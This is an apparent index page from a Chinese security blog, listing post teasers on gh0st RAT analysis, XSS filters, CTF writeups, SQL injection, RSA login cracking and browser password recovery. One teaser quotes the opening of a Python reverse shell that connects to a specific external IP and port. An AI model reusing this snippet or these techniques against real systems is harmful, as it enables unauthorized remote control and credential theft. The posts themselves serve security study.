排序
gh0st源码分析与远控的编写(四)
真的很久很久了,距离上一次写gh0st的文章(https://www.leavesongs.com/C/gh0st_3.html),过去有大半年了。总算有一个时间,我放下手里所有的活,能够继续把这份努力延续下去。 以后对于gh0st...
浅析白盒安全审计中的XSS Fliter
好久没写总结文。一转眼就到了4月,离可以游泳的季节又近了一步,心里还有点小激动。 这段时间也是学习了一些新东西,包括富文本的XSS,还有我正在看的node.js...
actf-2014-.L-writeup [by 冷夜]
协会actf2014队伍.L所有writeup,writen by 冷夜 播放地址:http://le4f.net/post/writeup/-ctf-actf-2014-l.-writeup 相关推荐: HappyCTF-writeup这个比赛...
python正向连接后门
python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...
浅析白盒审计中的字符编码及SQL注入
在freebuf上莫名地被喷,可能是因为被喷让人气上来了,最后得到的金币比前一篇文章更多。塞翁失马,焉知非福? 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统...
[ 转载 ] 解开人人网登录密码的 RSA 加密
我很少转载别人的文章的。但这篇确实让我眼前一亮,希望各位看客也能有所收获。 From 91ri : http://www.91ri.org/8928.html 世界上有两种密码:一种是防止你的小妹妹偷看你的文件;另一种是...
python 实现 php 的 var_dump 功能
最近在做python的web开发(原谅我的多变,好东西总想都学着。。。node.js也是),不过过程中总遇到些问题,不管是web.py还是django,开发起来确实没用php方便,毕竟存在的时间比...
web.py指南性说明
整理一下这些天研究web.py的一些经验,写一篇具有划时代意义的指南性说明~哈哈,开个玩笑,谨以此文献给所有学习web.py的同学以及Aaron Swart. web.py是一个开...
如何简单地找回保存在浏览器里的密码
一个简单的议题,也是同学们比较常遇到的问题,怎样找回保存在浏览器的“自动填写表单”功能中的密码。最容易想到的当然是抓包。一般的网站数据包里密码就是明文的,不过有些却也...